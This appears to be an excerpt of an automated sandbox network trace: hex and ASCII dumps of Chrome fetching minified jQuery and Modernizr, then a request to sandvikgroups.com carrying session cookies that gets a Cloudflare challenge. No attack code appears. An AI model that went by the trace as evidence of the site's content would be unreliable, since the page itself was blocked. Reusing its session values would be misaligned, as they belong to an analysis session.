                                        2025-01-07 21:06:23 UTC1369INData Raw: 3a 77 3b 72 65 74 75 72 6e 20 61 21 3d 3d 64 26 26 39 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 61 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3f 28 64 3d 61 2c 68 3d 64 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 67 3d 21 6f 28 64 29 2c 77 21 3d 3d 64 26 26 28 69 3d 64 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 69 2e 74 6f 70 21 3d 3d 69 26 26 28 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 72 65 2c 21 31 29 3a 69 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 69 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 72 65 29 29 2c 6e 2e 61 74 74 72 69 62 75 74 65 73 3d 75 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e
                                        Data Ascii: :w;return a!==d&&9===a.nodeType&&a.documentElement?(d=a,h=d.documentElement,g=!o(d),w!==d&&(i=d.defaultView)&&i.top!==i&&(i.addEventListener?i.addEventListener("unload",re,!1):i.attachEvent&&i.attachEvent("onunload",re)),n.attributes=ue(function(e){return
                                        2025-01-07 21:06:23 UTC1369INData Raw: 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3b 69 66 28 22 2a 22 3d 3d 3d 65 29 7b 77 68 69 6c 65 28 6e 3d 6f 5b 69 2b 2b 5d 29 31 3d 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 72 7d 72 65 74 75 72 6e 20 6f 7d 2c 72 2e 66 69 6e 64 2e 43 4c 41 53 53 3d 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43
                                        Data Ascii: qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},r.find.CLASS=n.getElementsByClassName&&function(e,t){if("undefined"!=typeof t.getElementsByC
                                        2025-01-07 21:06:23 UTC1369INData Raw: 61 74 63 68 65 73 7c 7c 68 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 68 2e 6d 6f 7a 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 68 2e 6f 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 68 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 29 29 26 26 75 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 3d 6d 2e 63 61 6c 6c 28 65 2c 22 2a 22 29 2c 6d 2e 63 61 6c 6c 28 65 2c 22 5b 73 21 3d 27 27 5d 3a 78 22 29 2c 76 2e 70 75 73 68 28 22 21 3d 22 2c 57 29 7d 29 2c 79 3d 79 2e 6c 65 6e 67 74 68 26 26 6e 65 77 20 52 65 67 45 78 70 28 79 2e 6a 6f 69 6e 28 22 7c 22 29 29 2c 76 3d 76 2e 6c 65 6e 67 74 68 26 26 6e 65 77 20 52 65 67 45 78 70 28 76 2e 6a 6f 69 6e 28 22 7c 22
                                        Data Ascii: atches||h.webkitMatchesSelector||h.mozMatchesSelector||h.oMatchesSelector||h.msMatchesSelector))&&ue(function(e){n.disconnectedMatch=m.call(e,"*"),m.call(e,"[s!='']:x"),v.push("!=",W)}),y=y.length&&new RegExp(y.join("|")),v=v.length&&new RegExp(v.join("|"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        42192.168.2.449809104.17.25.144435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:23 UTC386OUTGET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1
                                        Host: cdnjs.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:23 UTC961INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:23 GMT
                                        Content-Type: application/javascript; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=30672000
                                        ETag: W/"5eb03f26-2b4c"
                                        Last-Modified: Mon, 04 May 2020 16:13:26 GMT
                                        cf-cdnjs-via: cfworker/kv
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Timing-Allow-Origin: *
                                        X-Content-Type-Options: nosniff
                                        CF-Cache-Status: HIT
                                        Age: 1254226
                                        Expires: Sun, 28 Dec 2025 21:06:23 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZsGWyy6d3O%2BYptNy8rHcCLLI3zYSWxPdZqWkYStH23N%2F1ae38HwQHk3NAGexzV3q%2FEAV%2F9NZyW8zKOO9vDTaj73zl4o6WJTjiiT9vw3GbkWJMy9zcx2QRpsV7EpmP8AHAl8ynpf"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                        Strict-Transport-Security: max-age=15780000
                                        Server: cloudflare
                                        CF-RAY: 8fe6e951d9a280e0-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:23 UTC408INData Raw: 32 62 34 63 0d 0a 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 62 2e 63 73 73 54 65 78 74 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 72 28 53 2e 6a 6f 69 6e 28 65 2b 22 3b 22 29 2b 28 74 7c 7c 22 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 7e 28 22 22 2b 65 29 2e 69 6e 64 65 78 4f 66 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 7b 76 61 72 20 6f 3d 65 5b 72 5d 3b 69 66 28 21 69 28 6f 2c 22 2d 22 29 26 26 62 5b 6f 5d 21 3d
                                        Data Ascii: 2b4cwindow.Modernizr=function(e,t,n){function r(e){b.cssText=e}function o(e,t){return r(S.join(e+";")+(t||""))}function a(e,t){return typeof e===t}function i(e,t){return!!~(""+e).indexOf(t)}function c(e,t){for(var r in e){var o=e[r];if(!i(o,"-")&&b[o]!=
                                        2025-01-07 21:06:23 UTC1369INData Raw: 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 65 2e 73 6c 69 63 65 28 31 29 2c 6f 3d 28 65 2b 22 20 22 2b 6b 2e 6a 6f 69 6e 28 72 2b 22 20 22 29 2b 72 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 22 73 74 72 69 6e 67 22 29 7c 7c 61 28 74 2c 22 75 6e 64 65 66 69 6e 65 64 22 29 3f 63 28 6f 2c 74 29 3a 28 6f 3d 28 65 2b 22 20 22 2b 54 2e 6a 6f 69 6e 28 72 2b 22 20 22 29 2b 72 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 73 28 6f 2c 74 2c 6e 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 70 2e 69 6e 70 75 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 2c 6f 3d 6e 2e 6c 65 6e 67 74 68 3b 6f 3e 72 3b 72 2b 2b 29 6a 5b 6e 5b
                                        Data Ascii: ion u(e,t,n){var r=e.charAt(0).toUpperCase()+e.slice(1),o=(e+" "+k.join(r+" ")+r).split(" ");return a(t,"string")||a(t,"undefined")?c(o,t):(o=(e+" "+T.join(r+" ")+r).split(" "),s(o,t,n))}function l(){p.input=function(n){for(var r=0,o=n.length;o>r;r++)j[n[
                                        2025-01-07 21:06:23 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 61 2c 69 2c 63 2c 73 2c 75 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 6c 3d 74 2e 62 6f 64 79 2c 64 3d 6c 7c 7c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 64 79 22 29 3b 69 66 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 29 66 6f 72 28 3b 72 2d 2d 3b 29 63 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 63 2e 69 64 3d 6f 3f 6f 5b 72 5d 3a 76 2b 28 72 2b 31 29 2c 75 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 72 65 74 75 72 6e 20 61 3d 5b 22 26 23 31 37 33 3b 22 2c 27 3c 73 74 79 6c 65 20 69 64 3d 22 73 27 2c 76 2c 27 22 3e 27 2c 65 2c 22 3c 2f 73 74 79 6c 65 3e 22 5d 2e 6a 6f 69 6e 28 22 22 29 2c 75 2e 69 64 3d 76 2c 28
                                        Data Ascii: function(e,n,r,o){var a,i,c,s,u=t.createElement("div"),l=t.body,d=l||t.createElement("body");if(parseInt(r,10))for(;r--;)c=t.createElement("div"),c.id=o?o[r]:v+(r+1),u.appendChild(c);return a=["&#173;",'<style id="s',v,'">',e,"</style>"].join(""),u.id=v,(
                                        2025-01-07 21:06:23 UTC1369INData Raw: 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 3b 76 61 72 20 6e 3d 44 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 6f 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 76 61 72 20 61 3d 6e 65 77 20 6f 2c 69 3d 74 2e 61 70 70 6c 79 28 61 2c 6e 2e 63 6f 6e 63 61 74 28 44 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 28 69 29 3d 3d 3d 69 3f 69 3a 61 7d 72 65 74 75 72 6e 20 74 2e 61 70 70 6c 79 28 65
                                        Data Ascii: ){var t=this;if("function"!=typeof t)throw new TypeError;var n=D.call(arguments,1),r=function(){if(this instanceof r){var o=function(){};o.prototype=t.prototype;var a=new o,i=t.apply(a,n.concat(D.call(arguments)));return Object(i)===i?i:a}return t.apply(e
                                        2025-01-07 21:06:23 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 7c 7c 22 4d 6f 7a 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 7d 2c 4d 2e 72 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 31 35 30 2c 32 35 35 2c 31 35 30 2c 2e 35 29 22 29 2c 69 28 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 2c 22 72 67 62 61 22 29 7d 2c 4d 2e 68 73 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 31 32 30 2c 34 30 25 2c 31 30 30 25 2c 2e 35 29 22 29 2c 69 28 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 2c 22 72 67 62 61 22 29 7c 7c 69 28 62 2e 62
                                        Data Ascii: =function(){return"WebSocket"in e||"MozWebSocket"in e},M.rgba=function(){return r("background-color:rgba(150,255,150,.5)"),i(b.backgroundColor,"rgba")},M.hsla=function(){return r("background-color:hsla(120,40%,100%,.5)"),i(b.backgroundColor,"rgba")||i(b.b
                                        2025-01-07 21:06:23 UTC1369INData Raw: 74 72 61 6e 73 66 6f 72 6d 2d 33 64 29 7b 23 6d 6f 64 65 72 6e 69 7a 72 7b 6c 65 66 74 3a 39 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 68 65 69 67 68 74 3a 33 70 78 3b 7d 7d 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 3d 39 3d 3d 3d 74 2e 6f 66 66 73 65 74 4c 65 66 74 26 26 33 3d 3d 3d 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7d 29 2c 65 7d 2c 4d 2e 63 73 73 74 72 61 6e 73 69 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 28 22 74 72 61 6e 73 69 74 69 6f 6e 22 29 7d 2c 4d 2e 66 6f 6e 74 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 46 28 27 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 66 6f 6e 74 22 3b 73 72 63 3a 75 72 6c 28 22 68 74
                                        Data Ascii: transform-3d){#modernizr{left:9px;position:absolute;height:3px;}}",function(t){e=9===t.offsetLeft&&3===t.offsetHeight}),e},M.csstransitions=function(){return u("transition")},M.fontface=function(){var e;return F('@font-face {font-family:"font";src:url("ht
                                        2025-01-07 21:06:23 UTC1369INData Raw: 4d 2e 6c 6f 63 61 6c 73 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 76 2c 76 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 76 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 4d 2e 73 65 73 73 69 6f 6e 73 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 76 2c 76 29 2c 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 76 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 4d 2e 77 65 62 77 6f 72 6b 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29
                                        Data Ascii: M.localstorage=function(){try{return localStorage.setItem(v,v),localStorage.removeItem(v),!0}catch(e){return!1}},M.sessionstorage=function(){try{return sessionStorage.setItem(v,v),sessionStorage.removeItem(v),!0}catch(e){return!1}},M.webworkers=function()
                                        2025-01-07 21:06:23 UTC1369INData Raw: 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 2e 73 70 6c 69 74 28 22 20 22 29 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 3d 76 5b 65 5b 68 5d 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 67 2b 2b 2c 65 5b 68 5d 3d 67 2c 76 5b 67 5d 3d 74 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 6e 2c 72 29 7b 69 66 28 6e 7c 7c 28 6e 3d 74 29 2c 6c 29 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 3b 72 7c 7c 28 72 3d 6f 28 6e 29 29 3b 76 61 72 20 61 3b 72 65 74 75 72 6e 20 61 3d 72 2e 63 61 63 68 65 5b 65 5d 3f 72 2e 63 61 63 68 65 5b 65 5d 2e 63 6c 6f 6e 65 4e 6f 64 65 28 29 3a 70 2e 74 65 73 74 28 65 29 3f 28 72 2e 63 61 63 68 65 5b 65 5d 3d 72 2e 63 72 65 61 74 65 45 6c 65 6d 28 65 29 29 2e 63 6c
                                        Data Ascii: ing"==typeof e?e.split(" "):e}function o(e){var t=v[e[h]];return t||(t={},g++,e[h]=g,v[g]=t),t}function a(e,n,r){if(n||(n=t),l)return n.createElement(e);r||(r=o(n));var a;return a=r.cache[e]?r.cache[e].cloneNode():p.test(e)?(r.cache[e]=r.createElem(e)).cl
                                        2025-01-07 21:06:23 UTC1101INData Raw: 7c 73 74 72 6f 6e 67 7c 73 74 79 6c 65 7c 74 61 62 6c 65 7c 74 62 6f 64 79 7c 74 64 7c 74 68 7c 74 72 7c 75 6c 29 24 2f 69 2c 68 3d 22 5f 68 74 6d 6c 35 73 68 69 76 22 2c 67 3d 30 2c 76 3d 7b 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 78 79 7a 3e 3c 2f 78 79 7a 3e 22 2c 75 3d 22 68 69 64 64 65 6e 22 69 6e 20 65 2c 6c 3d 31 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 76 61 72 20 65 3d 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e
                                        Data Ascii: |strong|style|table|tbody|td|th|tr|ul)$/i,h="_html5shiv",g=0,v={};!function(){try{var e=t.createElement("a");e.innerHTML="<xyz></xyz>",u="hidden"in e,l=1==e.childNodes.length||function(){t.createElement("a");var e=t.createDocumentFragment();return"undefin
                                        2025-01-07 21:06:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        43192.168.2.449812188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:24 UTC826OUTGET /?get_link=ch_files/lib/js/jquery-3.3.1.min.js HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:24 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:06:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:06:24 UTC963INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 44 44 35 75 66 58 4a 4c 54 71 4a 4c 75 50 4b 53 54 69 6b 46 38 62 67 4a 61 4c 34 4e 6c 37 4a 62 54 4e 35 78 51 70 67 65 38 2f 6a 57 38 73 4c 77 30 44 32 6e 4a 32 63 49 59 70 35 79 43 37 69 4c 46 6a 7a 77 75 6e 4e 65 33 57 49 7a 77 48 42 75 78 58 4d 57 33 30 52 79 72 37 72 54 42 6b 4b 59 47 57 56 38 70 59 66 5a 39 61 2f 6e 6c 78 49 6d 38 7a 61 4c 72 53 62 55 4b 4b 78 38 70 36 31 61 71 50 77 32 31 52 77 43 41 6f 4e 41 70 67 34 4a 4b 52 6d 54 73 77 3d 3d 24 79 4d 62 7a 45 42 5a 33 54 61 4a 48 64 6d 46 58 38 6b 37 6d 64 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: DD5ufXJLTqJLuPKSTikF8bgJaL4Nl7JbTN5xQpge8/jW8sLw0D2nJ2cIYp5yC7iLFjzwunNe3WIzwHBuxXMW30Ryr7rTBkKYGWV8pYfZ9a/nlxIm8zaLrSbUKKx8p61aqPw21RwCAoNApg4JKRmTsw==$yMbzEBZ3TaJHdmFX8k7mdw==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:06:24 UTC1369INData Raw: 32 32 37 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 2278<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                        2025-01-07 21:06:24 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                        Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                        2025-01-07 21:06:24 UTC1369INData Raw: 4c 55 6a 34 4f 6f 2d 31 37 33 36 32 38 33 39 38 34 2d 31 2e 32 2e 31 2e 31 2d 38 32 41 50 53 52 51 58 76 65 64 4a 69 4c 39 4d 78 68 74 4f 39 5a 68 41 71 33 43 35 5a 6c 48 46 53 61 54 37 50 53 66 78 39 78 36 73 4b 6d 77 52 6c 64 37 4f 39 53 6f 57 4a 2e 74 75 74 39 70 7a 49 2e 78 33 4a 41 73 78 44 5f 32 62 75 42 48 4e 48 58 53 77 6a 38 66 54 74 49 33 69 76 32 65 45 49 47 38 72 41 78 2e 63 7a 5a 42 52 76 5f 51 36 45 4f 4d 72 75 62 4c 36 35 45 69 4e 4f 6f 44 53 35 4e 48 36 70 34 36 65 52 5f 68 67 45 63 66 2e 75 2e 68 49 4b 34 64 46 6f 4b 76 6d 6d 39 53 4f 67 57 72 73 79 48 5a 34 4b 30 31 46 6f 70 48 47 73 61 4e 38 4b 70 68 37 66 47 45 4a 46 38 5f 39 5f 75 4a 67 6b 47 48 55 39 74 43 73 78 5f 57 73 57 49 51 6c 59 56 5f 4d 38 42 44 64 33 51 6d 5a 4c 78 34 6a 53
